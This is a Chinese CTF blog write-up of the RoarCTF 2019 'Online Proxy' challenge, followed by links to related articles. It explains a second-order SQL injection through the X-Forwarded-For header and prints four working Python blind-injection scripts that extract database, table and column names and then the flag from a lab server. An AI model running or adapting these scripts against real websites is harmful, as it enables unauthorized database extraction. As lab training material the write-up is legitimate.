[RoarCTF 2019]Online Proxy

最新推荐文章于 2024-03-29 07:00:00 发布
最新推荐文章于 2024-03-29 07:00:00 发布
阅读量2.6k 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/102636793
版权

1.1 X-Forwarded-For

一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。并且我们发现,通过X-Forwarded-For,确实可以伪造我们的IP。我感觉这到题就应该换一个名字,这题和proxy有半毛钱关系,而且那个duration time也是忽悠人了。

1.2 思路

我们测试一下,先输入 1’ or ‘1 此时我们的current IP就等于它,让后我们再随便换一个其他的东西,只要和刚才那个不一样就可以,比如111,那么我们的current IP就成了:111,而last IP就是1’ or ‘1,此时1’ or '1已经写入了数据库 .因为第一次和第二次传输的IP不一样,所以服务器并不会从数据库找last IP,它会把上次的IP(1’or ‘1)直接显示为last IP,让后存入数据库。那么我们再传一次111,因为和currnet IP相同,那么last IP就会从数据库里寻找,也就是会执行1’or‘1,结果为一。

1.3 hint:flag不一定在当前数据库

2.1 爆数据库

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.2 表名

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.3 字段

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

2.4 flag

import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)
沐目_01
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
JsProxy A js proxy online
04-21
【JsProxy:在线JavaScript代理与离线打包工具】 JsProxy是一个强大的在线JavaScript处理工具,它提供了两种主要功能:JavaScript代理(js proxy)和JavaScript打包(js packer)。这两个功能对于前端开发者来说是...
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 971
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
[RoarCTF 2019]Online Proxy --不会编程的崽
最新发布
不会编程的崽的博客
03-29 863
sql注入 盲注
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 626
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
Desktop Proxy for Online Dictionaries-开源
06-30
DDict 是一个可扩展的桌面在线词典集成代理。 它驻留在系统托盘中,允许用户同时在多个在线词典中快速查找单词
on-dhcp-proxy
05-03
on-dhcp-proxy提供了DHCP代理服务,以使RackHD PXE工作流引擎能够与现有的DHCP服务器一起运行。 版权所有2015,EMC,Inc. 设置 要将on-dhcp-proxy作为独立服务运行,它要求isc-dhcp-server在后台运行。 要安装isc...
3proxy-0.9.3_3proxy_
09-29
一个功能强大的代理软件,通过简单的配置即可实现快速透传
rails-reverse-proxy:Ruby on Rails的反向代理
02-06
Rails-反向代理Ruby on Rails的反向代理。 反向代理接受来自客户端的请求,将其转发到可以满足该请求的服务器,然后将服务器的响应返回给客户端安装你知道该怎么做。 在您的Gemfile中gem 'rails-reverse-proxy' 然后...
Waysonline 突破局域网限制 可有免费时间
08-14
直接双击运行waysonline.exe,在弹出的网页窗口输入你在waysonline的帐号和密码(可免费注册),非会员请选择[公众服务区/PUBLIC GATEWAY]。登录成功以后,单击V3任务栏绿色小图标: 运行: - 方式1:用v3启动你希望代理的程序。 点击[运行程序/Start New Application],若只需代理游戏数据,不需要代理网页流量,选[除Web以外/Bypass Web Traffic](此为或双击图标时的默认方式),节省连接数及带宽,否则选[全部网络通讯/Include All Traffic]。在打开文件窗口里,选择要运行的应用、游戏程序或快捷方式,[打开]后即开始运行该程序,并通过Waysonline服务器进行通讯。 - 方式2:从正在运行的进程里面选择一个。 点击[选择进程/Attach to Process],在进程列表里选择希望代理的进程。当程序发起新建的网络连接时,就会通过V3代理出去。对于通过v3启动拦截无效的情况,可采用本方式,此方式对已经建立的连接并无作用。若你希望默认代理之后所有运行的程序,可以添加"Explorer.exe"进程。 成功: 当程序开始网络访问后,任务栏上V3小图标应有连接数以及数据变化。若你不希望某些程序使用V3代理,请在[选择进程]列表里移除当前运行的程序。该程序以后将不会通过V3代理,直至你重新添加。
BUUCTF--[RoarCTF 2019]Online Proxy
qq_46263951的博客
07-19 347
这里发现通过修改X-FORWARDED-FOR的值注释部分的内容也随之改变 尝试盲注,上传命令时第一次为Current Ip发现并不能执行,再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行,再次send即可正常执行命令 简单尝试使用盲注得到所有库名,这里可以看到该方法是没问题的 ...
几个在线的web代理
weixin_34186128的博客
08-14 790
http://www.cemsg.com/web/ http://pooling.info http://proxyol.com http://www.haozs.net/Proxyonline.htm http://web.proxycn.com/
BUU [RoarCTF 2019]Online Proxy
Jay17的博客
03-08 435
BUU [RoarCTF 2019]Online Proxy
在线代理(Web ProxyServer)完全详解
热门推荐
thisispan
09-14 4万+
在线代理(Web Proxy)原理可以简单的概述为:用户(A)-在线代理服务器(B)-目标网站(C),即:A向B发送浏览请求-B执行请求发送给C-C收到请求,回应。 什么是在线代理   在线代理英文全称是(Web ProxyServer),又称在线代理。代理服务器其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他
内网穿透神器 NeutrinoProxy 1.8.0 版本发布
BASK2311的博客
04-06 1533
笔者时间、能力有限,且开源项目非一朝一夕之事,存在众多问题亦在所难免。使用、学习过程中有任何问题欢迎大家与我联系。更多使用姿势、细节请通过官网或结尾微信二维码加我备注"中微子代理"入群交流。对项目有什么想法或者建议,可以加我微信拉交流群,或者创建。1.1、 Docker一键部署。1.2、使用jar包自行部署。使用默认sqlite数据库。指定自己的mysql数据库。指定版本安装,推荐使用。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值